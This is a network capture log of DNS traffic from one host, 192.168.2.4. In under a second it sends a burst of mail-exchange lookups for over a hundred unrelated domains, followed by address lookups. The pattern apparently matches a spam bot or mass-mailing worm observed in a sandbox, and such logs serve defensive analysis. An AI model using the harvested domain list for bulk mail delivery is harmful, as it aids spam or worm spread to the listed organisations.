Dec 22, 2023 21:14:48.953049898 CET	192.168.2.4	1.1.1.1	0x9a85	Standard query (0)	hermanassociatesnewyork.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.953222036 CET	192.168.2.4	1.1.1.1	0xe8ef	Standard query (0)	jiashi.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.953310966 CET	192.168.2.4	1.1.1.1	0x2bc4	Standard query (0)	91069b3d854a1035.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.953619003 CET	192.168.2.4	1.1.1.1	0x889a	Standard query (0)	aikya.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.953730106 CET	192.168.2.4	1.1.1.1	0xaf9a	Standard query (0)	omuramba.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.954022884 CET	192.168.2.4	1.1.1.1	0x3d2a	Standard query (0)	souriahost.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.954179049 CET	192.168.2.4	1.1.1.1	0x9092	Standard query (0)	davescheirer.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.954363108 CET	192.168.2.4	1.1.1.1	0xf9b0	Standard query (0)	dpikorea.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.954647064 CET	192.168.2.4	1.1.1.1	0x26d	Standard query (0)	kegerators.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.954689980 CET	192.168.2.4	1.1.1.1	0x1b6f	Standard query (0)	aldine.org.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.955013990 CET	192.168.2.4	1.1.1.1	0xf270	Standard query (0)	enricobassi.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.955094099 CET	192.168.2.4	1.1.1.1	0x1170	Standard query (0)	jesusanswwers.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.955526114 CET	192.168.2.4	1.1.1.1	0x6f25	Standard query (0)	acaiforcemaxweightloss.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.955724001 CET	192.168.2.4	1.1.1.1	0xbb82	Standard query (0)	hyiquu.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.955812931 CET	192.168.2.4	1.1.1.1	0xbc17	Standard query (0)	pistik.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.956132889 CET	192.168.2.4	1.1.1.1	0x5cc0	Standard query (0)	dm.famm.us	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.956475019 CET	192.168.2.4	1.1.1.1	0xc671	Standard query (0)	263host.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.956507921 CET	192.168.2.4	1.1.1.1	0x8970	Standard query (0)	tvs-e.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.956861973 CET	192.168.2.4	1.1.1.1	0xfbf	Standard query (0)	derrickandbriggs.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.956897020 CET	192.168.2.4	1.1.1.1	0xc68d	Standard query (0)	piiyuw.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.957146883 CET	192.168.2.4	1.1.1.1	0xd894	Standard query (0)	keywordranker.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.957294941 CET	192.168.2.4	1.1.1.1	0x7587	Standard query (0)	thenile.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.957422018 CET	192.168.2.4	1.1.1.1	0x746c	Standard query (0)	arbsdecq.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.957775116 CET	192.168.2.4	1.1.1.1	0xbcea	Standard query (0)	demarillac.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.957894087 CET	192.168.2.4	1.1.1.1	0x904e	Standard query (0)	ambquinn.plus.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.958002090 CET	192.168.2.4	1.1.1.1	0xe56	Standard query (0)	racesystems.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.958479881 CET	192.168.2.4	1.1.1.1	0xc62	Standard query (0)	9a07f8a339ec2a3e.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.958556890 CET	192.168.2.4	1.1.1.1	0xf926	Standard query (0)	bldowney.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.958889961 CET	192.168.2.4	1.1.1.1	0x346d	Standard query (0)	taylorbryant.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.958926916 CET	192.168.2.4	1.1.1.1	0x55d8	Standard query (0)	oe.target.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.959316969 CET	192.168.2.4	1.1.1.1	0x6fb8	Standard query (0)	videolifeperu.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.959350109 CET	192.168.2.4	1.1.1.1	0x3708	Standard query (0)	enhancementsmast.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.959724903 CET	192.168.2.4	1.1.1.1	0xd670	Standard query (0)	chemcaregroup.compg	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.959757090 CET	192.168.2.4	1.1.1.1	0xdddd	Standard query (0)	cicfl.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960146904 CET	192.168.2.4	1.1.1.1	0x646a	Standard query (0)	indfos.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960237980 CET	192.168.2.4	1.1.1.1	0xb501	Standard query (0)	coupons2grab.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960467100 CET	192.168.2.4	1.1.1.1	0xe52	Standard query (0)	daystarbookscharity.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960587978 CET	192.168.2.4	1.1.1.1	0xaf12	Standard query (0)	distraction.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960833073 CET	192.168.2.4	1.1.1.1	0x6dcb	Standard query (0)	maroonshockey.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.960971117 CET	192.168.2.4	1.1.1.1	0xd45a	Standard query (0)	dinfos.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.961173058 CET	192.168.2.4	1.1.1.1	0x27ec	Standard query (0)	ismaworld.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.961574078 CET	192.168.2.4	1.1.1.1	0xe10e	Standard query (0)	fotoestudiomiret.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.961652994 CET	192.168.2.4	1.1.1.1	0xda0d	Standard query (0)	vixej.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.961879015 CET	192.168.2.4	1.1.1.1	0x7287	Standard query (0)	esisalama.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.962235928 CET	192.168.2.4	1.1.1.1	0xb311	Standard query (0)	ispsolucoes.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.962538958 CET	192.168.2.4	1.1.1.1	0x5a17	Standard query (0)	flandria-loisirs.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.962867022 CET	192.168.2.4	1.1.1.1	0x984f	Standard query (0)	pmcsystem.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.962974072 CET	192.168.2.4	1.1.1.1	0xa514	Standard query (0)	mywitce.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.963033915 CET	192.168.2.4	1.1.1.1	0x6506	Standard query (0)	excursionesmadryn.com.ar	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.963474989 CET	192.168.2.4	1.1.1.1	0xba28	Standard query (0)	dresslermd.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.963651896 CET	192.168.2.4	1.1.1.1	0x5e8	Standard query (0)	sitehalogen.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.963890076 CET	192.168.2.4	1.1.1.1	0x6fc2	Standard query (0)	afrimail.33mail.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.964054108 CET	192.168.2.4	1.1.1.1	0x5732	Standard query (0)	rdhppx.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.964246035 CET	192.168.2.4	1.1.1.1	0xa25b	Standard query (0)	ireland-ventures.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.964519978 CET	192.168.2.4	1.1.1.1	0x38f1	Standard query (0)	easlab.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.964555979 CET	192.168.2.4	1.1.1.1	0x5c48	Standard query (0)	buyhits.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.964942932 CET	192.168.2.4	1.1.1.1	0x81fb	Standard query (0)	adelaideclub.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.965095043 CET	192.168.2.4	1.1.1.1	0x9c2e	Standard query (0)	shapeab.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.965301991 CET	192.168.2.4	1.1.1.1	0xb523	Standard query (0)	theproducebox.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.965559959 CET	192.168.2.4	1.1.1.1	0x7a67	Standard query (0)	smartiebritches.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.965781927 CET	192.168.2.4	1.1.1.1	0x23c8	Standard query (0)	adm-works.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.966140032 CET	192.168.2.4	1.1.1.1	0xa09a	Standard query (0)	dl-it.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.966171980 CET	192.168.2.4	1.1.1.1	0xf0a4	Standard query (0)	massnegocios.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.966582060 CET	192.168.2.4	1.1.1.1	0x9d74	Standard query (0)	studnets.ocps.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.966726065 CET	192.168.2.4	1.1.1.1	0xf4f8	Standard query (0)	nhclex.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.966999054 CET	192.168.2.4	1.1.1.1	0xf246	Standard query (0)	bilfinger.comqa	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.967344046 CET	192.168.2.4	1.1.1.1	0x8af7	Standard query (0)	loghole.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.967344046 CET	192.168.2.4	1.1.1.1	0x74ce	Standard query (0)	select-feeds.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.968312025 CET	192.168.2.4	1.1.1.1	0x91e3	Standard query (0)	oceanictrailers.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.968476057 CET	192.168.2.4	1.1.1.1	0x9f64	Standard query (0)	firsteuropaglobal.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.968909025 CET	192.168.2.4	1.1.1.1	0xcc8	Standard query (0)	srlbonfon9.com.hk	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.968940973 CET	192.168.2.4	1.1.1.1	0x2589	Standard query (0)	154892628.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.969475031 CET	192.168.2.4	1.1.1.1	0xfa2f	Standard query (0)	intermountainmls.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.969475031 CET	192.168.2.4	1.1.1.1	0x8d41	Standard query (0)	rio-perfume.orgua	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.969993114 CET	192.168.2.4	1.1.1.1	0x744	Standard query (0)	joserafael.com.ve	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.970079899 CET	192.168.2.4	1.1.1.1	0x1f0f	Standard query (0)	saskgmail.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.970397949 CET	192.168.2.4	1.1.1.1	0x28d9	Standard query (0)	asdfhjlasdfhjlk1.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.970582962 CET	192.168.2.4	1.1.1.1	0xe0b3	Standard query (0)	aurora-resorts.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.970884085 CET	192.168.2.4	1.1.1.1	0x724c	Standard query (0)	eddc.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.970927000 CET	192.168.2.4	1.1.1.1	0x75de	Standard query (0)	cominex.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.971266985 CET	192.168.2.4	1.1.1.1	0xcf08	Standard query (0)	mailbox.lpl.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.971488953 CET	192.168.2.4	1.1.1.1	0xd5ce	Standard query (0)	cannaclear.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.971651077 CET	192.168.2.4	1.1.1.1	0xb02a	Standard query (0)	covicol.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.971879959 CET	192.168.2.4	1.1.1.1	0xc5fd	Standard query (0)	customintegrated.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.972054958 CET	192.168.2.4	1.1.1.1	0x15ff	Standard query (0)	vesond.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.972253084 CET	192.168.2.4	1.1.1.1	0x3365	Standard query (0)	bopclip.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.972548962 CET	192.168.2.4	1.1.1.1	0xefd0	Standard query (0)	djmeca.com.ca	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.972750902 CET	192.168.2.4	1.1.1.1	0xbaa7	Standard query (0)	customizedperformance.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.972927094 CET	192.168.2.4	1.1.1.1	0xa7f0	Standard query (0)	rumbeandoelmundo.com.ar	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.973278046 CET	192.168.2.4	1.1.1.1	0x27be	Standard query (0)	valentinegrowers.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.973315954 CET	192.168.2.4	1.1.1.1	0xa4ea	Standard query (0)	yandfcorp.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.973712921 CET	192.168.2.4	1.1.1.1	0x83a7	Standard query (0)	caribbean360.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.973845005 CET	192.168.2.4	1.1.1.1	0x5d54	Standard query (0)	sunbeltfinancial.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.974173069 CET	192.168.2.4	1.1.1.1	0x729f	Standard query (0)	earnmagabucks.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.974282026 CET	192.168.2.4	1.1.1.1	0xaf25	Standard query (0)	51goabroad.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.974455118 CET	192.168.2.4	1.1.1.1	0x9520	Standard query (0)	oljud.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.974816084 CET	192.168.2.4	1.1.1.1	0x9370	Standard query (0)	yuejichem.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.974848986 CET	192.168.2.4	1.1.1.1	0x268d	Standard query (0)	gn.ais.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.975171089 CET	192.168.2.4	1.1.1.1	0x76ea	Standard query (0)	tgeddesgrant.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.975250959 CET	192.168.2.4	1.1.1.1	0xf15a	Standard query (0)	fuckyoufriday.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.975519896 CET	192.168.2.4	1.1.1.1	0xec96	Standard query (0)	necalin.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.975750923 CET	192.168.2.4	1.1.1.1	0xfabb	Standard query (0)	harrell-associates.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.976011992 CET	192.168.2.4	1.1.1.1	0x658e	Standard query (0)	mercor.compl	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.976314068 CET	192.168.2.4	1.1.1.1	0xc2ae	Standard query (0)	pkmanagment.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.976314068 CET	192.168.2.4	1.1.1.1	0xa138	Standard query (0)	sodataol.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.976685047 CET	192.168.2.4	1.1.1.1	0x6c9a	Standard query (0)	djaskdas.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.976758003 CET	192.168.2.4	1.1.1.1	0xff22	Standard query (0)	liberty25.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.977123022 CET	192.168.2.4	1.1.1.1	0x2651	Standard query (0)	grassgraphics.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.977185965 CET	192.168.2.4	1.1.1.1	0x6476	Standard query (0)	freedhal.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.977494955 CET	192.168.2.4	1.1.1.1	0x9af1	Standard query (0)	williamcroy.plus.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.977755070 CET	192.168.2.4	1.1.1.1	0x65fd	Standard query (0)	nsorekek.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.030335903 CET	192.168.2.4	1.1.1.1	0xd8ff	Standard query (0)	gpa.orgau	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.093461990 CET	192.168.2.4	1.1.1.1	0x28df	Standard query (0)	mcammond.net	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.367003918 CET	192.168.2.4	1.1.1.1	0x433a	Standard query (0)	cicfl.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.406727076 CET	192.168.2.4	1.1.1.1	0xc3af	Standard query (0)	adelaideclub.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.427237988 CET	192.168.2.4	1.1.1.1	0xa49b	Standard query (0)	shapeab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.433238029 CET	192.168.2.4	1.1.1.1	0x229a	Standard query (0)	easlab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.433270931 CET	192.168.2.4	1.1.1.1	0x73a8	Standard query (0)	buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.433613062 CET	192.168.2.4	1.1.1.1	0xe13d	Standard query (0)	rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.593975067 CET	192.168.2.4	1.1.1.1	0xecdd	Standard query (0)	ireland-ventures.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.727397919 CET	192.168.2.4	1.1.1.1	0x7c30	Standard query (0)	enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728171110 CET	192.168.2.4	1.1.1.1	0x433a	Standard query (0)	cicfl.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728252888 CET	192.168.2.4	1.1.1.1	0xc3af	Standard query (0)	adelaideclub.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728291035 CET	192.168.2.4	1.1.1.1	0xa49b	Standard query (0)	shapeab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728291988 CET	192.168.2.4	1.1.1.1	0xe13d	Standard query (0)	rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728343010 CET	192.168.2.4	1.1.1.1	0x73a8	Standard query (0)	buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728343010 CET	192.168.2.4	1.1.1.1	0x229a	Standard query (0)	easlab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728573084 CET	192.168.2.4	1.1.1.1	0x1adc	Standard query (0)	afrimail.33mail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.728763103 CET	192.168.2.4	1.1.1.1	0xb1b9	Standard query (0)	dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.729069948 CET	192.168.2.4	1.1.1.1	0x720f	Standard query (0)	sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.729347944 CET	192.168.2.4	1.1.1.1	0x66c2	Standard query (0)	grassgraphics.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.729599953 CET	192.168.2.4	1.1.1.1	0x50be	Standard query (0)	jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.733047962 CET	192.168.2.4	1.1.1.1	0x1c76	Standard query (0)	aldine.org.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.733278036 CET	192.168.2.4	1.1.1.1	0x2d99	Standard query (0)	ispsolucoes.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.733513117 CET	192.168.2.4	1.1.1.1	0xfd28	Standard query (0)	pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.733731031 CET	192.168.2.4	1.1.1.1	0x3caf	Standard query (0)	excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.733956099 CET	192.168.2.4	1.1.1.1	0x5718	Standard query (0)	flandria-loisirs.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.734146118 CET	192.168.2.4	1.1.1.1	0xb83f	Standard query (0)	mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.734302044 CET	192.168.2.4	1.1.1.1	0x991b	Standard query (0)	esisalama.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.734496117 CET	192.168.2.4	1.1.1.1	0x3ce6	Standard query (0)	vixej.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.734724998 CET	192.168.2.4	1.1.1.1	0x453f	Standard query (0)	fotoestudiomiret.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.735064030 CET	192.168.2.4	1.1.1.1	0x5e14	Standard query (0)	nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.735368967 CET	192.168.2.4	1.1.1.1	0x19d8	Standard query (0)	ismaworld.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.751934052 CET	192.168.2.4	1.1.1.1	0x285b	Standard query (0)	maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.754348993 CET	192.168.2.4	1.1.1.1	0xeb99	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.754415035 CET	192.168.2.4	1.1.1.1	0x8c7a	Standard query (0)	dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.754599094 CET	192.168.2.4	1.1.1.1	0xe5c3	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.754833937 CET	192.168.2.4	1.1.1.1	0x8807	Standard query (0)	daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.755156994 CET	192.168.2.4	1.1.1.1	0xa30f	Standard query (0)	coupons2grab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.755434036 CET	192.168.2.4	1.1.1.1	0x2033	Standard query (0)	indfos.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.755707979 CET	192.168.2.4	1.1.1.1	0x4ea1	Standard query (0)	videolifeperu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.756005049 CET	192.168.2.4	1.1.1.1	0x1ab8	Standard query (0)	enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.756268978 CET	192.168.2.4	1.1.1.1	0xc62	Standard query (0)	oe.target.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.756546974 CET	192.168.2.4	1.1.1.1	0x85a7	Standard query (0)	e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.756983042 CET	192.168.2.4	1.1.1.1	0xf102	Standard query (0)	9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.757220984 CET	192.168.2.4	1.1.1.1	0x96d7	Standard query (0)	thenile.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.757489920 CET	192.168.2.4	1.1.1.1	0x2868	Standard query (0)	ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.757729053 CET	192.168.2.4	1.1.1.1	0x7bba	Standard query (0)	bldowney.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.757987976 CET	192.168.2.4	1.1.1.1	0x71ca	Standard query (0)	dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.758253098 CET	192.168.2.4	1.1.1.1	0x3139	Standard query (0)	arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.758457899 CET	192.168.2.4	1.1.1.1	0x9995	Standard query (0)	racesystems.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.758699894 CET	192.168.2.4	1.1.1.1	0xd446	Standard query (0)	derrickandbriggs.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.775613070 CET	192.168.2.4	1.1.1.1	0x4a09	Standard query (0)	piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.775962114 CET	192.168.2.4	1.1.1.1	0xfa0a	Standard query (0)	tvs-e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.776187897 CET	192.168.2.4	1.1.1.1	0x5afc	Standard query (0)	263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.776384115 CET	192.168.2.4	1.1.1.1	0x26b2	Standard query (0)	pistik.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.776643038 CET	192.168.2.4	1.1.1.1	0xd0aa	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.776984930 CET	192.168.2.4	1.1.1.1	0x43e4	Standard query (0)	hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.777861118 CET	192.168.2.4	1.1.1.1	0x814	Standard query (0)	kegerators.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.778048038 CET	192.168.2.4	1.1.1.1	0x1d15	Standard query (0)	dpikorea.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.778326035 CET	192.168.2.4	1.1.1.1	0x1f2e	Standard query (0)	davescheirer.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.778590918 CET	192.168.2.4	1.1.1.1	0x15cc	Standard query (0)	souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.778808117 CET	192.168.2.4	1.1.1.1	0x355f	Standard query (0)	91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.779099941 CET	192.168.2.4	1.1.1.1	0xf1e	Standard query (0)	omuramba.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.779354095 CET	192.168.2.4	1.1.1.1	0x835e	Standard query (0)	hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.779736042 CET	192.168.2.4	1.1.1.1	0x9a62	Standard query (0)	jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.780116081 CET	192.168.2.4	1.1.1.1	0x123b	Standard query (0)	geis.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.780338049 CET	192.168.2.4	1.1.1.1	0x2e47	Standard query (0)	hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.780586958 CET	192.168.2.4	1.1.1.1	0x26e1	Standard query (0)	pcfocus.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.780822992 CET	192.168.2.4	1.1.1.1	0x26ab	Standard query (0)	djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.781075001 CET	192.168.2.4	1.1.1.1	0x624c	Standard query (0)	pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.781297922 CET	192.168.2.4	1.1.1.1	0x44f6	Standard query (0)	freedhal.com	A (IP address)	IN (0x0001)	false
